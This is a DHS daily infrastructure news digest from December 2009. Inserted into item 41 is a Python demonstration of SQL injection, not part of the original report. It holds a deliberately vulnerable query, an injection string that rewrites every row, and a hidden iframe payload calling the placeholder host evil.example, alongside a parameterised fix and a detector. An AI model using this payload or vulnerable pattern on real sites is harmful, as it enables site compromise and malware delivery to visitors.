Department of Homeland Security Daily Open Source Infrastructure Report

Monday, December 14, 2009

Complete DHS Daily Report for December 14, 2009

Daily Report

Top Stories

• WNBC 4 New York reports that the offices of the American Express headquarters in downtown New York were evacuated on December 10 after several suspicious envelopes containing a “white powdery substance” were discovered. Seven envelopes in all were sent to various locations in Manhattan, including the JP Morgan headquarters, but there was nothing to indicate they were any real threat. (See item 14 below in the Banking and Finance Sector)

• According to the Omaha World-Herald, a propane-fueled fire at a dairy production and processing plant in Norfolk, Nebraska caused approximately 7,000 people to be evacuated on December 10. The fire was put out after crews managed to shut valves that cut off the flow from a 30,000-gallon propane tank. (See item 19)

19. December 10, Omaha World-Herald – (Nebraska) Norfolk fire now extinguished; evacuation lifted. A propane-fueled fire at a dairy production and processing plant in Norfolk, Nebraska caused roughly one-third of the city (approximately 7,000 people) to be evacuated on December 10. A city administrator said the fire was put out after crews managed to shut valves that cut off the flow from a 30,000-gallon propane tank. The fire at the Protient plant broke out around 7 a.m. and fears that the tank itself might explode prompted officials to order the evacuation. In addition to homes, the area includes dozens of businesses, five public elementary schools, a junior high school, the city’s main shopping center, its motel corridor and the southern half of downtown. S. Highway 81 was closed at the Nebraska Highway 32 junction, and U.S. Highway 275 was closed at Nebraska Highway 24. The city administrator said two unmanned fire units sprayed water on the blaze because it was too dangerous for crews to get close. Protient closed the plant one year ago. Just days ago, it was leased by an Illinois company with plans to return it to full production, the Norfolk Daily News reported. The city administrator said the propane tank threatened by the fire was filled on Wednesday. Ten to 12 workers inside the plant at the time the fire broke out escaped. There were no reports of injuries. Norfolk is about 100 miles northwest of Omaha. Source:


Banking and Finance Sector

12. December 10, IDG News Services – (International) Microsoft joins Swiss vendor to push SQL Server in banks. Microsoft and Swiss banking systems provider Temenos have joined forces to push SQL Server in the banking sector, the companies said today. SQL Server will be used as part of Temenos’ core banking system, T24, which is the back-office system that manages accounts and customer information, and lets banks offer other financial services, said the global alliances director at Temenos. One of the advantages of using SQL Server is lower cost, the director said. However, banks are cautious; stability, security and performance have to be proved before they adopt a product. The reliability of SQL Server is not questioned, according to the director. But showing that SQL Server can perform on the same level as Oracle and IBM is something the two companies have to do. Banks are not convinced, he said. Microsoft and Temenos will work together to demonstrate that SQL Server’s performance can equal or surpass other databases, according to the director. However, lab tests won’t be enough. Most banks do not want to be the first to use a product, so showing that others are already using SQL Server and T24 will be important. For example, North Shore Credit Union has started using both, according to a statement. Source:

13. December 10, WFTS 28 Tampa – (Florida) White powder scare forces Tampa office building evacuation. An office building on Gandy Boulevard was evacuated after a white powder was found inside an envelope that had been mailed there Thursday afternoon. According to a Tampa Fire Rescue spokesman the envelope was delivered to the Bank of America building at 4109 Gandy just before 1:00 p.m. It contained a white powder and a threat. He would not elaborate on the nature of the threat. The building is an operations center for Bank of America, not a branch. Sixteen people were directly exposed to the substance. They are being evaluated at the scene. At least 100 people were evacuated from the building but were allowed back inside shortly after 2 p.m, after hazmat crews and postal inspectors determined the substance was not dangerous. Source:

14. December 10, WNBC 4 New York – (New York) Anthrax scare at American Express HQ. Employees at the American Express headquarters at 3 World Financial Center downtown had an anthrax scare on December 10 and three floors had to be evacuated. Several suspicious envelopes containing a “white powdery substance” were discovered in the financial giant’s offices at 200 Vesey Street sometime before 3 p.m., sources inside the company said. AmEx officials immediately contacted authorities, and the building’s 39th, 40th, and 51st floors — where the envelopes were discovered — were evacuated. The building’s heating and air-conditioning system was also turned off, according to an internal memo. The investigation was still ongoing in the early evening, and officials said it was too soon to tell if there was any toxicity in the malicious missives. Some employees who came in contact with the powder were scrubbed down by hazmat crews. Later police officials said that seven envelopes in all were sent to various locations in Manhattan, including the JP Morgan headquarters, but there was nothing to indicate they were any real threat. They were all sent from Maryland, the officials said. Source:

Information Technology

37. December 11, ComputerWorld – (International) Rather than patch, Microsoft blocks buggy code. Microsoft has decided to disable a 17-year-old video codec in older versions of Windows rather than patch multiple vulnerabilities, according to the company’s security team. On December 8, the same day it issued six updates that patched 12 bugs, Microsoft released a security advisory that outlined the unusual move, which blocks the Indeo codec — software that compresses and decompresses video data — from being used by either Internet Explorer (IE) or Windows Media Player. The update also prevents other applications that access the Internet from loading the codec. It is unclear exactly how many unpatched vulnerabilities the Indeo codec contains, but at least two security companies — VeriSign iDefense and Fortinet — issued their own Indeo bug alerts on December 8. The vulnerability uncovered by iDefense was reported to Microsoft more than a year ago. The update targets only the oldest editions of Microsoft’s operating system: Windows 2000, Windows XP and Windows Server 2003. Windows Vista, Windows 7 and Windows Server 2008 already bar the Indeo codec from loading. Intel introduced the codec in 1992. By blocking the codec from being used in IE and Windows Media Player, said Microsoft, it is protecting users against the known attack vectors, which rely on duping people into visiting a malicious site that serves a crafted video file. Note that the codec itself remains installed; the update only stops the Internet-facing applications from loading it, so a local application that still loads Indeo is outside the advisory’s protection. It is unusual for Microsoft to skip patching known vulnerabilities and instead disable — “deprecate” in programming terminology — bits of code. “This is a rare occurrence, as it is usually challenging to remove functionality from products that customers are currently using without affecting existing applications,” a Microsoft spokesman acknowledged via e-mail on December 10. Source:

38. December 10, The Register – (International) Scareware slingers flaunt fake MS endorsement. Scareware wronguns have developed a neat but evil piece of coding trickery designed to dupe prospective marks into believing that Microsoft is endorsing their worthless scamware. A rogue anti-malware product called DefenceLab redirects infected PCs to Microsoft’s Support portal, but modifies the HTML content as it returns so as to appear as if Microsoft is endorsing the worthless software. The ploy, which follows a fake scan and bogus Windows Security Center alert, is designed to persuade Windows users already exposed to infection by agents of the scareware package to pay for a full version of the supposed clean-up utility. Surfers visiting the URL on the Windows Support site referenced in the scareware from a clean PC will get a 404 ‘page not found’ message. Hacked PC victims will see an apparent endorsement. Screenshots of the attack in action can be found in a blog post by anti-spyware firm Sunbelt Software, which was the first to warn of the threat. Source:

39. December 10, DarkReading – (International) Droid smartphone hacked. First the iPhone, now the Droid: A hacker has unleashed an exploit that lets a user wrest administrative root control of his or her Motorola Droid smartphone. The code, which was posted on the AllDroid online forum, lets a user gain root privileges to either Motorola Droid Android 2.0 or Android 2.0.1 version phones. That basically means a user can run whatever themes, gadgets, and applications he or she wants — akin to a jailbroken iPhone. The Droid, which is based on Google’s Android operating system, runs on Verizon’s network. Unlocking or jailbreaking comes with its risks, too, of course: Not only could it possibly “brick” or render the device unoperational and deactivate its warranty, but a jailbroken phone also leaves the door open for malware writers. The director of security operations for nCircle, says the danger to enterprises is that users could then work around any IT security policies. Treat mobile devices like laptops, he says. “Now you have this mobile device where an end user can continually make any changes that he desires. Now it becomes an untrusted platform, and it’s unknown what the user has done, installed, or subverted,” whether the user realizes it or not, he says. “Enterprise IT should be concerned.” Just what the “rooted” Droid means for consumer users is unclear, the director says. “It’s still too early to say what a rooted Android looks like... It’s only been 48 hours since the [exploit] went public,” he says. Source:

40. December 10, ComputerWorld – (International) Droid Eris software update starts from Verizon. Verizon Wireless started pushing an over-the-air update to Droid Eris smartphones today with eight software fixes designed to improve performance. The improvements address concerns that some online forum users had considered inconveniences with the Eris, built by HTC. None were apparently as serious as problems with the Motorola Droid that Verizon addressed in 14 software fixes that it started sending in an over-the-air update that began on Monday. Both phones run on the Android operating system. In both cases, the updates are being sent to customers in phases, each to last about a week. Customers will get an alert of the update and will have to accept the download, a Verizon spokeswoman said. The fixes for the Eris include allowing picture messages from LG phones to be opened and improving SMS and MMS messaging delivery. A delay that first-time users experienced in receiving their first call on activation has also been eliminated, Verizon said. With the Motorola Droid, the update’s 14 fixes include reducing a voice echo that hundreds of online forum users said was a problem for people receiving a call from a Droid phone. However, the phased-in rollout of the update appears not to have reached some customers on Motorola’s support forum where it couldn’t be determined whether the update is addressing the echo. Some comments indicate user frustration with continuing to wait for the update. Source:

41. December 10, The Register – (International) Potent malware link infects almost 300,000 webpages. A security researcher has identified a new attack that has infected almost 300,000 webpages with links that direct visitors to a potent cocktail of malicious exploits. The SQL injection attacks started in late November and appear to be the work of a relatively new malware gang, said a researcher with ScanSafe, a web security firm recently acquired by Cisco Systems. Hacked sites contain an invisible iframe that silently redirects users to 318x .com (a space has been added to protect the clueless), which goes on to exploit known vulnerabilities in at least five applications. At time of writing, a web search showed more than 294,000 webpages that contained the malicious script. Infected sites included yementimes .com, parisattitude .com and knowledgespeak .com. People who visit infected pages receive an invisible link that pulls code from a series of sites tied to 318x .com. The code looks for insecure versions of Adobe Flash, Internet Explorer, and several other Microsoft applications, and when they are detected it exploits them to surreptitiously install malware known as Backdoor.Win32.Buzus.croo. The rootkit-enabled program logs banking credentials and may do other nefarious bidding, the researcher said. At the moment, about two percent of the requests ScanSafe sees are for sites infected by the malicious link, an indication the threat is significant, she said. SQL injection attacks prey on web applications that build database queries by splicing user-supplied input directly into the SQL text instead of passing it as bound parameters, so a crafted value is executed as part of the statement. Because the injected content is written into the site’s own database, every page rendered from the poisoned rows serves the attacker’s iframe to visitors. Such attacks are a favorite way of adding malicious links and content to third-party websites and were also the chink that allowed hackers the toehold they needed to steal more than 130 million credit card numbers from card processor Heartland Payment Systems and four other companies. Source:
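The mechanism behind the mass-injection campaign above, as an added example that is not part of the original report or of ScanSafe’s analysis. The Python/sqlite3 script below shows a content-management update whose WHERE clause is built by string formatting, so an attacker-controlled owner field rewrites every row of the table to carry a zero-sized iframe; the same update written with bound parameters, which stores the payload as inert text and matches no row; and a small scanner that flags hidden iframes in stored content the way a web-security product would. The table, its rows, and the placeholder host evil.example are constructed for this example; the redirector domain named in the article is deliberately not used.

```python
import re
import sqlite3

# Constructed payload: a zero-sized iframe pointing at a placeholder host.
# evil.example is an assumption for this example, not the domain from the attack.
INJECTED_IFRAME = (
    '<iframe src="http://evil.example/in.cgi" width="0" height="0"></iframe>'
)


def make_db():
    """Constructed sample: a table of per-owner page footers rendered into HTML."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, owner TEXT, footer TEXT)")
    conn.executemany(
        "INSERT INTO pages (owner, footer) VALUES (?, ?)",
        [("alice", "(c) Alice"), ("bob", "(c) Bob"), ("carol", "(c) Carol")],
    )
    conn.commit()
    return conn


def set_footer_vulnerable(conn, owner, footer):
    """Vulnerable: both values are spliced into the SQL text, so a quote in
    `owner` terminates the string literal and the rest is parsed as SQL."""
    sql = "UPDATE pages SET footer = '%s' WHERE owner = '%s'" % (footer, owner)
    conn.execute(sql)
    conn.commit()


def set_footer_safe(conn, owner, footer):
    """Fixed: parameterised statement. The driver hands the values to the
    engine separately from the SQL text, so they can never become SQL."""
    conn.execute("UPDATE pages SET footer = ? WHERE owner = ?", (footer, owner))
    conn.commit()


IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ZERO_SIZE_RE = re.compile(r"""\b(?:width|height)\s*=\s*["']?0(?:px)?\b""", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)""", re.IGNORECASE)


def hidden_iframes(html):
    """Return the src of every iframe that is zero-sized or hidden by inline
    CSS: the shape of the invisible element the article describes."""
    hits = []
    for attrs in IFRAME_RE.findall(html):
        compact = attrs.lower().replace(" ", "")
        if ZERO_SIZE_RE.search(attrs) or "display:none" in compact or "visibility:hidden" in compact:
            m = SRC_RE.search(attrs)
            hits.append(m.group(1) if m else "")
    return hits


def infected_owners(conn):
    """Owners whose stored footer would serve a hidden iframe to visitors."""
    rows = conn.execute("SELECT owner, footer FROM pages ORDER BY id").fetchall()
    return [owner for owner, footer in rows if hidden_iframes(footer)]


if __name__ == "__main__":
    # The attacker supplies the owner field. The closing quote ends the
    # literal and OR '1'='1 makes the WHERE clause true for every row.
    attacker_owner = "bob' OR '1'='1"

    db = make_db()
    set_footer_vulnerable(db, attacker_owner, INJECTED_IFRAME)
    print("vulnerable:", infected_owners(db))  # ['alice', 'bob', 'carol']

    db = make_db()
    set_footer_safe(db, attacker_owner, INJECTED_IFRAME)
    print("parameterised:", infected_owners(db))  # []
```

The scanner is intentionally narrow: it only recognises the zero-size and display:none patterns, so an iframe positioned off-screen or shrunk from an external stylesheet would pass it. That is why the fix belongs in the query code, not in a filter over the output; the parameterised version stops the write from ever reaching rows the caller did not name.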

42. December 10, Computer Weekly – (International) Governments must unite to head off cyber-terrorism threat, says Kaspersky. Governments have begun working to combat cyber threats, but many are working on national initiatives to tackle a global problem, says Russian security firm Kaspersky Lab. “To fix this problem, governments need to think internationally,” said the chief executive and co-founder of Kaspersky Lab. In an increasingly digital world, where all systems, including those for critical national infrastructures, are connected to the internet, every person, business and economy is at risk of cyber attack, he said. Although cybercrime is a big and growing problem, cyber terrorism is an even greater concern, said the chief executive. “We have not seen any real instances of cyber terrorism yet, but it is technically possible and just about everyone depends on the internet,” he said. The Conficker worm has shown that criminals are able to build botnets of millions of hijacked computers. “This means it is possible to build a botnet that has the power to halt the internet, but this threat is still not fully understood,” said the chief executive. “The capability exists to do very serious damage. Not only for money, but to scare people, which is the definition of terrorism,” he told Computer Weekly. Source:

For another story, see Item 35 below

35. December 10, Associated Press – (International) Feds go global to fight cybercriminals overseas. Concerned about the rise in sophisticated computer attacks from abroad, the FBI and the U.S. Secret Service are beefing up their international cybercrime enforcement, sending agents who specialize in the threats overseas to specifically deal with digital perils. Their growing coordination with other nations, however, faces legal and political challenges posed by conflicting laws and the lack of broadly accepted international guidelines for Internet oversight. “With the increased connectivity in countries that heretofore didn’t have that amount of access, and the technological advances made in corporate America that have put vulnerable financial information online, it’s been the perfect storm,” said the assistant director of the FBI’s cyber division. So far, he said, the FBI has set up new cybercrime offices in four countries, including Romania, Estonia and the Netherlands, and is hoping to add two or three more over the next year. He would not name the fourth country. The cybercrime specialists operate in addition to the 61 legal attache offices the FBI has overseas. “We’ve gotten so many requests (for help in overseas cases) that we actually have started to embed FBI personnel into the national police agencies of a number of countries,” he said. The U.S. Secret Service, meanwhile, is setting up an electronic crimes task force office in Rome, and adding a field office in Tallinn, Estonia. While the Secret Service declined to discuss specific staffing, the agency now includes some computer training for all of its 3,400 agents. According to officials, countries in Eastern Europe, Africa and South America — including Nigeria, Brazil, Ukraine, and until recently Romania — have become burgeoning sanctuaries for hackers because of weak law enforcement. Source:

Communications Sector

43. December 11, ISP Review – (International) London Internet exchange failure slows UK ISP Internet traffic. The London Internet Exchange (LINX) suffered a major failure during Thursday afternoon after one of its crucial network switches was knocked offline by an unspecified software fault. Hundreds of UK and European Broadband ISPs connect through LINX’s HUB, and the impact upon Internet traffic during the fault is clearly visible in their usage graph. At its worst, LINX lost just over 100Gbps of traffic to the outage, which is just over one third of its average normal load for the affected period. The service has since been returned to a normal and stable state of operation. Source:

44. December 11, WFED 1500 Radio – (Utah) Admin. Babbitt: Human error, not technology, behind November FAA outage. The head of the Federal Aviation Administration (FAA) told FederalNewsRadio that they are a little closer to finding the cause of a telecommunications SNAFU that snarled air traffic across the country. “Preliminary reports show us, not shockingly, it was a human error,” he said in an interview on the Federal Drive. “We had a router being replaced, routinely, in an upgrade situation. While during the installation, they turned one of the warning systems off and didn’t turn it back on.” FAA earlier said the November 19 incident began with the failure of a single circuit board in a router. A backup circuit board also failed. As a result, misinformation was sent to FAA computer centers near Atlanta and Salt Lake City. It was four hours before the glitch was fixed. The Administrator stressed he believes the failure was a “unique one-off. I think the one thing that everyone should be aware of: We had no compromise of safety in this outage. We had no loss of radio communications, radar coverage... all of our separation... Air Traffic Control was working just fine.” Source:

45. December 10, Web Host Industry Review – (Virginia) Amazon data center power loss causes EC2 disturbances. An Amazon Web Services data center was disrupted for about five hours due to an apparent power outage, causing some Amazon EC2 cloud users to experience problems with their workloads. InformationWeek reported that a segment of Amazon’s Eastern US hosting services experienced problems early Wednesday morning, slowing down EC2 cloud instances in its East-1 region for a five-hour period according to status reports posted on Amazon’s Service Health Dashboard as it worked to restore customer workloads. While Amazon did not specify the location of the facility, Amazon Web Services is known to operate a Washington DC-area data center near McLean in Northern Virginia. Source:

For another story, see item 42 above in the Information Technology Sector